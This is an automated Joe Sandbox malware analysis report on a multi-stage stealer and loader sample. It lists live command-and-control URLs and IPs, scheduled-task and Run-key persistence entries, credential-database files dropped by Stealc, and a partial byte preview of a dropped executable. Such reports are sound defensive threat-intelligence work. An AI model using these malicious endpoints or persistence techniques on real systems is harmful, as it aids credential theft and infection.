http://x1.i.lencr.org/0	new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://villagedguy.cyou/apiE	new_v8.exe, 0000001B.00000003.2912258369.000000000123C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpm	stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dllO	stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1	new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fonts.com	dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	dac4554719.exe, 0000001D.00000002.3179400913.000000001C672000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/api1	c1a4d3220c.exe, 00000021.00000003.3261447035.0000000001304000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3240812796.0000000001304000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
185.215.113.36	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
2.59.161.36	unknown	Russian Federation	44676	VMAGE-ASRU	false
104.21.32.196	unknown	United States	13335	CLOUDFLARENETUS	false
20.42.65.92	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.67.145.203	unknown	United States	13335	CLOUDFLARENETUS	false
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
104.102.49.254	unknown	United States	16625	AKAMAI-ASUS	false
185.215.113.217	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
162.159.134.233	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546667
Start date and time:	2024-11-01 12:31:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	54
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@83/101@0/13
EGA Information:	Successful, ratio: 40%
HCA Information:	Successful, ratio: 70% Number of executed functions: 88 Number of non-executed functions: 115
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target axplong.exe, PID 3684 because there are no executed function
Execution Graph export aborted for target file.exe, PID 4456 because it is empty
Execution Graph export aborted for target new_v8.exe, PID 3340 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
07:33:01	API Interceptor	752873x Sleep call for process: axplong.exe modified
07:33:30	API Interceptor	5099x Sleep call for process: Jurisdiction.pif modified
07:33:41	API Interceptor	9x Sleep call for process: new_v8.exe modified
07:33:53	API Interceptor	11135x Sleep call for process: c1a4d3220c.exe modified
07:33:57	API Interceptor	9x Sleep call for process: GOLD1234.exe modified
07:33:59	API Interceptor	3292x Sleep call for process: RegAsm.exe modified
07:34:12	API Interceptor	10x Sleep call for process: shop.exe modified
07:34:29	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:31:59	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
11:33:30	Task Scheduler	Run new task: Wall path: wscript s>//B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
11:33:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
11:34:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f6f4816752.exe C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe
11:34:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1bd0484d71.exe C:\Users\user\AppData\Local\Temp\1001507001\1bd0484d71.exe
11:34:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f6f4816752.exe C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe
11:34:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1bd0484d71.exe C:\Users\user\AppData\Local\Temp\1001507001\1bd0484d71.exe
11:34:52	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
11:35:09	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
11:35:26	Task Scheduler	Run new task: Enjoy path: wscript s>//B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
11:35:29	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1.1.1.1	PO-230821_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
	AFfv8HpACF.exe	Get hash	malicious	Unknown	Browse	1.1.1.1/
	INVOICE_90990_PDF.exe	Get hash	malicious	FormBook	Browse	www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
	Go.exe	Get hash	malicious	Unknown	Browse	1.1.1.1/
185.215.113.36	5GP8oxUsvj.exe	Get hash	malicious	Unknown	Browse	185.215.113.36/zenaaaretest/CPU.zip
185.215.113.36	SecuriteInfo.com.generic.ml.7966.exe	Get hash	malicious	Amadey RedLine	Browse	185.215.113.36/DebasedSeptenary_2021-09-29_00-21.exe
2.59.161.36	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
104.21.32.196	z5DptXNeB1.exe	Get hash	malicious	Lokibot	Browse	ideshowsx.xyz/ide/five/fre.php
20.42.65.92	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar	Browse
	jYDYjpSbvf.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, Stealc	Browse
	T8TY28UxiT.dll	Get hash	malicious	Unknown	Browse
	H1pXo79CPd	Get hash	malicious	GhostRat	Browse
	https://downcheck.nyc3.cdn.digitaloceanspaces.com/dengo.zip	Get hash	malicious	Unknown	Browse
	tera10.zip	Get hash	malicious	Unknown	Browse
	3.dll	Get hash	malicious	Unknown	Browse
	vir.zip	Get hash	malicious	LummaC Stealer	Browse
	K1.zip	Get hash	malicious	Unknown	Browse
	ZED Online.zip	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	Alvise Maria CV 1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	Action Desk Support 01 Nov.msg	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.cognitoforms.com/f/wAh1CzXrnEmEifrmJ4OEgg/1	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.24.14
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.97.3
VMAGE-ASRU	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	2.59.161.36
	http://rt.authses.online	Get hash	malicious	Unknown	Browse	45.148.244.222
	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	194.116.215.195
	Report-41952.lnk	Get hash	malicious	Unknown	Browse	193.242.145.138
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	194.116.215.195
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	194.116.215.195
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	194.116.215.195
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	Alvise Maria CV 1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	Action Desk Support 01 Nov.msg	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.cognitoforms.com/f/wAh1CzXrnEmEifrmJ4OEgg/1	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.24.14
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.97.3
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\ProgramData\LgAmARwZ\Application.exe	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\LgAmARwZ\Application.exe	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AKEGDHJD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKECAEBG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBFIDGIIIJDBGDGDAKKFCGCGID

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCGIJKJJKEBGHJKFIDGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HCFBAFIDAECAKFHJDBAFIEBKKK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHCGDAFBKFIDHJJJDHC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIJEBFCFIJJJEBGDBAKEHCAFHI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJKKKJJJKJKFHJJJJEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\LgAmARwZ\Application.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GOLD1234.exe_d44442c1f0a3f935813f9615943caaa76ea8d679_3ea6409d_effe71aa-767b-4c8f-9d68-caad73e2b842\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6635508494461193
Encrypted:	false
SSDEEP:	96:0FFHriGPsHphDoI7RT6tQXIDcQvc6QcEVcw3cE/6aH+HbHg/5hZAX/d5FMT2SlPY:kDP80BU/4jhzuiF8Z24IO8mw
MD5:	5E6C470EE196CAA4764C946038680F31
SHA1:	E1D43E56E453370F304D3C94C09093E30019B0CB
SHA-256:	49A40B1A7731E04194B5B582642267927BF1048FCFFBD50F95AA966100FFB5F0
SHA-512:	EBB8DEA510AFE905537242D00B4BF64E551024BC0A93F5F5CF063938D9400638BBF7D0A1D2A09909CA7BC1846CB296BEE7DB5CA191CF3756D1102EF7FB38BC3B
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.9.3.4.4.3.7.3.0.4.2.2.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.9.3.4.4.3.7.8.3.5.4.6.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.f.e.7.1.a.a.-.7.6.7.b.-.4.c.8.f.-.9.d.6.8.-.c.a.a.d.7.3.e.2.b.8.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.9.8.b.c.a.b.-.a.9.8.5.-.4.2.6.5.-.9.6.9.5.-.1.2.4.f.5.5.5.e.c.f.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.G.O.L.D.1.2.3.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.8.-.0.0.0.1.-.0.0.1.4.-.a.c.5.c.-.4.d.e.c.5.1.2.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.e.c.5.a.6.8.a.e.c.0.8.7.7.1.0.a.f.c.b.b.8.6.a.2.9.9.4.1.3.8.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.3.4.5.7.e.5.a.8.b.4.1.e.d.6.f.4.2.b.3.1.9.7.c.f.f.5.3.c.8.e.c.5.0.b.4.d.b.2.!.G.O.L.D.1.2.3.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER84D3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Nov 1 11:33:57 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	34140
Entropy (8bit):	1.6649332857915549
Encrypted:	false
SSDEEP:	96:5n8mrA6cmFu4glXvU1ci77CHq/9iEVuaAtcbtyRat/595WI9LI0ZDaIhrSbvoWTA:OQcZBOZgftcbtFt/rKvNT4p
